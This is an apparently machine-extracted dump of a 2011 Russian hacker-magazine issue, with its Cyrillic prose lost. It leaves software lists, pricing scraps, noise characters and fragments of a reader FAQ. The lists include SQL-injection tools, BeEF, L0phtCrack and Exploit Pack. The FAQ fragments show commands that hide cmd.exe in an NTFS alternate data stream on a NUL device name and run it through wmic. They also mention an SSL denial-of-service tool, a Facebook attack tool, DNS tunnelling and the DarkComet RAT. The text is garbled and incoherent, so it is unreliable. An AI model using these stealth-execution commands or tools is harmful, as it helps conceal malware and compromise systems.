DipTrace 2.2
Evernote 4.5.1
Foxit Reader 5.1
GeeTeeDee 0.1.274
GIMPshop 2.2.8
Greenshot 0.8.1
IrfanView 4.30
PicPick 3.0.9
Virtual DJ 7.0.5
Virtual Piano 4.0
WorldWide Telescope 3.0.5.1
Xbmc 10.1
XnConvert 1.10
>Misc
AltDrag 0.9
CollageIt
Desk Drive 1.8.2
DeskView
Dropresize
F.lux
FilerFrog 2.0
FluentNotepad
Q10 1.2.21
RandomScreensaver 2.0.1
Scrybe 1.6.4
TaskDock
Wheel Here 1.4.2
Windows Themes Installer 1.1
YoWindow 2.0
>>WINDOWS
>Development
BinVis
CollabNet Subversion Edge 2.1.1
Crack.NET 1.2
Dependency Walker 2.2
Expresso 3.0
HttpWatch 7.2
Immunity Debugger 1.83
jQueryPad
Parrot 3.9.0
Scapy 2.2.0
SQLiteStudio 2.0.19
VisualSVN Server 2.5
WebStorm 3.0
WinAppDbg 1.4
>Devel
Dojo 1.6.1
Fltk 3.0.x-r9155
Fpdf 1.7
Glade 3.10.2
Gwt 2.4.0
>>UNIX
>Desktop
Audacity 1.3.13-beta
Blender 2.60a
Darktable 0.9.2
Digikam 2.2.0
Dvdstyler 2.0
Gcad3d 1.70
Inscape 0.48.2
Kmplayer 0.11.3a
Luckybackup 0.4.6
Midnight commander 4.8.0
Peazip 4.1
Picasa 3.0
Postr 0.12.4
Seahorse 2.28.1
Soundkonverter 1.2.0
Sox 14.3.2
Xneur 0.14.0
Zim 0.53
>System
Chameleon Shutdown 1.1.1.30
Disk Space Fan
Drive Backup 0.0604
HD Speed 1.7.1.90
IObit Toolbox 1.2
LockNote 1.0.5
MenuMaid 1.0.1
MonitorES 1.0.1
NirLauncher
QRM Plus Manager 1.0
RecycleBinEx 1.0.5.530
Soluto
Switcher 2.0.0
SystemMonitor 1.64
WinBubble 2.0
WindowMenuPlus 1.14
Sql-Injection:
MySqloit 0.1
SQID 0.3
SQL Power Injector 1.2
Sqlbftools 1.2
SQLBrute
Sqlmap 0.9
SQLNinja 0.2.6
>Security
AppAdmin 1.1.0
BeEF 0.4.2.10
Free File Wiper 0.7d
Freeraser 1.0.0.23
Secret Disk 1.35
Telemachus 1.0
Tor 0.2.2.34
USB Port Locked 2.0
Volatility 2.0
WinLockr
WipeFile 2.1.1
>Server
Apache 2.2.21
Asterisk 1.6.2.20
>Security
Clamav 0.97.3
Ctunnel 0.6
Gnutls 3.0.5
Nikto 2.1.4
Pac 3.3.5
Passwordsafe 0.6.0beta
Pdfcrack 0.11
Saferhoneypot 20111027
Slackfire 0.65.e
Snare 2.0.0
ARMu 0.17b
DOM Snitch v0.725
ExaScan
Exploit Pack
findmyhash 1.1.2
hash-identifier 1.1
Hatkit Proxy 0.5.1
L0phtCrack v6.0.12c
Ostinato v0.5
PacketFence 3.0.2
Watcher 1.5.4
WiFuzz
xSQLScanner 1.2
>Net
Amule 2.3.1rc2
Bareftp 0.3.9
Bitlbee 3.0.3
Blam 1.8.7
Chrome 13.0.782
Drivel 3.0.3
Fatrat 1.1.3
Gnugk 2.3.5
Ifolder 3.8.0.3
Opera 11.52
Peerguardian 2.1.3
Qbittorrent 2.9.2
Qwit 1.1-pre2
Remmina 0.9.3
Skype 2.2.0.35
Smb4k 0.10.90
Sylpheed 3.1.2
Uget 1.8.0
>Games
Rigsofrods 0.38.64
Sauerbraten 20100728
Simutrans 110.0.1
Jfreechart 1.0.17
Jqueryui 1.8.16
Juce 1.53
Lazarus 0.9.30.2rc2
Libsdl-android
Matplotlib 1.1.0
Movicon 1.0b
Poedit 1.4.6.1
Scintilla 2.29
Symfony 2.0.4
Tcpdf 5.9.134
Ultimatepp 3211
Wxwidgets 2.9.2
>>MAC
0xED 1.0.9
Bean 2.9.7
DragonDisk 0.92
Eddie 2.1
Firefox 8.0
ImageBurner 2.0
KeyCue 6.0
Letterbox 0.24b9
LiteSpeed Web Server 4.1.7
Opera 11.52
OS Track
Palringo 4.0.1
Punto Switcher 3.2.5
Que 1.3.1
Raven 0.6
TeamViewer 6.0.10548
Tunatic 1.1
uTorrent 1.5.11
VirtualBox 4.1.4
>X-distr
Fedora 16 Desktop Edition
Puppy 5.3
Slce 6.1
Ubuntu 11.10
>System
2clickupdate 6.0
Ajenti 0.6.0
Bluez 4.96
Checkinstall 1.6.2
Collectl 3.6.0
Cryptmount 4.2.1
Fslint 2.42
Grub 1.99
Kml 3.1_001
Nilfs-utils 2.1.0-rc2
Robinhood 2.3.2
Smartmontools 5.42
Squashfs 4.2
Sysstat 10.0.2
Testdisk 6.12
Bind 9.8.1
Cups 1.5.0
Dhcp 4.2.3
Dovecot 2.0.15
Freeradius 2.1.12
Lighttpd 1.4.29
Minidlna 1.0.22
Mysql 5.5.17
Nsd 3.2.8
Openldap 2.4.26
Openvpn 2.2.1
Postfix 2.8.6
Postgresql 9.1.1
Samba 3.6.1
Sendmail 8.14.5
Snort 2.9.1.2
Squid 3.1.16
Syslog-ng 3.3.1
Vsftpd 2.3.4
12(155) 2011
i)0V
.!4
plmazh
pq_lc_oqimcglb_
_q_igl_
nmj{fma_qdjdh
vdodfo_pwgodlg~
&)2%&/8
glqdoa{}p
pmfc_qdjdk
.').8
odimkdlcma_ll_~
-'*5.11)1*/'0
8889",&136
!
800
!
191
2200 . ( )
23% ,
(250 )
30 ,
31 ,
31 .
8.5
DVD
!
!
,
, :
+ DVD
Total Football
+ DVD
DVD
+ DVD
DVDXpert
+ DVD
Smoke
,
.
PC
+ 2 DVD
+ DVD
T3
Digital Photo
+ DVD
+ DVD
12 2200 .
6 1260 .
,
!
.
: 210
x 09 (152) 2011
LULZSEC
09 (152) 2011
082
1. , , shop.glc.ru.
2. .
3.
:
e-mail: subscribe@glc.ru;
: (495) 545-09-06;
: 115280, ,
. , 19, ,
5 ., 21,
, .
500 .
WINDOWS 7
PHPMYADMIN
064
ANDROID 070
152
,
JAVASCRIPT 050
:
, ,
FOX NEWS
+ + 2 DVD:
162
( 35% , )
!
,
.
12 3890 (24 )
6 2205 (12 )
.
,
ant
FAQ United
FAQ@REAL.XAKEP.RU
ANDROID, .
- ,
?
,
.
- ,
.
Honeynet Project A.R.E (Android Reverse Engineering)
Android.
: Androguard,
Android sdk/ndk, APKInspector, Apktool,
A xmlprinter, Ded, Dex2jar, DroidBox, Jad,
Smali/Baksmali
.
A.R.E
redmine.
honeynet.org/projects/are/wiki.
,
,
HIGHLOAD?
,
,
-,
, ,
,
.
.
The Hackers Choice DDoS, SSL-.
thc-ssl-dos ,
SSL-
15 , .
SSL. ,
2003 ! -
:
-
FACEBOOK?
fbpwn (code.google.com/p/fbpwn).
,
, -
.
,
,
.
,
- ,
,
.
, DNS-
.
DNS-
?
! DNS-
.
DNS.
,
DNS-. :
,
- .
DNS, iodine (code.
kryo.se/iodine).
-
iodined:
5 : WINDOWS-
Windows-
,
.
, ,
. ,
-
.
140
,
.
Loggly (loggly.
com).
: syslog/syslog-ng
API.
Windows
syslog. ,
. ,
, ,
API loggly.
12 /155/ 2011
FAQ UNITED
:
f , ;
m mtu
MTU ( DNS-);
l IP
IP, ( ,
DNS-,
);
P .
-
NTFS?
,
ADS.
C:\temp>dir /r C:\temp
Directory of C:\temp
.
..
5 NUL
1 File(s)
5 bytes
,
,
iodine:
C:\temp>streams C:\temp
Streams v1.56 - Enumerate alternate
(C) 1999-2007 Mark Russinovich
NTFS data streams
No files with streams found.
.
,
- (CON,
PRN, AUX, NUL, COM1, LPT1 ..),
dir /R
streams.exe .
, ,
\\?\ . ,
ADS:
,
,
DNS-.
DNS-, ,
.
,
Q
,
. . . -
.
?
.
.
,
WMIC:
C:\temp>wmic process call create
\\?\C:\temp\NUL:hidden_ADS.exe
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
ProcessId = 1620;
ReturnValue = 0;
};
:\temp>type C:\Windows\System32\
cmd.exe > \\?\C:\temp\NUL:hidden_
ADS.exe
:
,
,
.
:
<FilesMatch "\.(gif|jpe?g)$">
SetEnvIf Referer "^http://
([^/]*\.)?mydomain.com/" request_ok = 1
Order Allow, Deny
Allow from env=request_ok
</FilesMatch>
(GIF JPG)
, (mydomain.com). ,
NTsyslog (troy.jdmz.net/syslogwin)
,
, Windows
syslog-. ,
, syslog-.
12 /155/ 2011
,
, .
Windows-
Snare (www.intersectalliance.
com).
, , . Windows
Snare Agent.
-
Loggly .
. Graylog2 (graylog2.org)
syslog- , -
.
141
Apache'
.htaccess.
.
,
(2 ).
.
,
. ?
, , ,
. . . P2P, . -,
.
torrent- ( ).
, ,
, -,
.
Torrent2exe.com
.torrent
. DriverPack Solution 11 (drp.su/ru),
Torrent2exe. : 3 .
ant
(
cp1251,
, )
(
latin1).
. Sypex Dumper
(sypex.net).
, auto.
. ,
, cp1251,
. !
,
,
UTF-8.
UTF-8,
, . ,
UTF-8, UTF-8,
latin1.
MySQL
UTF-8,
latin1, MySQL latin1 UTF-8.
SSH-,
LINUX-?
SLIDESHARE,
. ?
,
, iptables.
, :
A ,
.
,
bash-,
-.
GitHub' (https://
gist.github.com/1129974).
.
.
. ?
,
cp1251,
latin1. . :
.
-
,
?
, ,
TeamViewer Chrome Remote Desktop,
Google.
DarkCometRAT (www.darkcomet-rat.com),
, -
.
, DarkComet-RAT .
,
SOCKS5,
.
:).
TOR.
(
-- ),
.
,
SOCKS, Tor-.
Torsocks (code.google.
com/p/torsocks):
$ usewithtor [application]
MySQL 4.1 ;
,
,
,
, ;
142
,
/proc/net/ipt_recent/SSH.
.
, -
application ,
Tor.
. , ssh
some.ssh.com, Tor:
$ usewithtor ssh username @ some.ssh.com
,
.
SWF-, ,
.
as3-proxy
(github.com/alun/as3-proxy).
-
Apparat (code.google.com/p/apparat)
.
,
. z
12 /155/ 2011
UNITS /
+ Bluetooth=
SMS
.
SMS .
, .
1
2
. Bluetooth,
(pairing)
.
,
.
2
AT-,
SMS-
.
,
Bluetooth-.
3
.
,
.
144
4
, ,
TeamViewer.
.
.
.
11 /154/ 2011
>> coding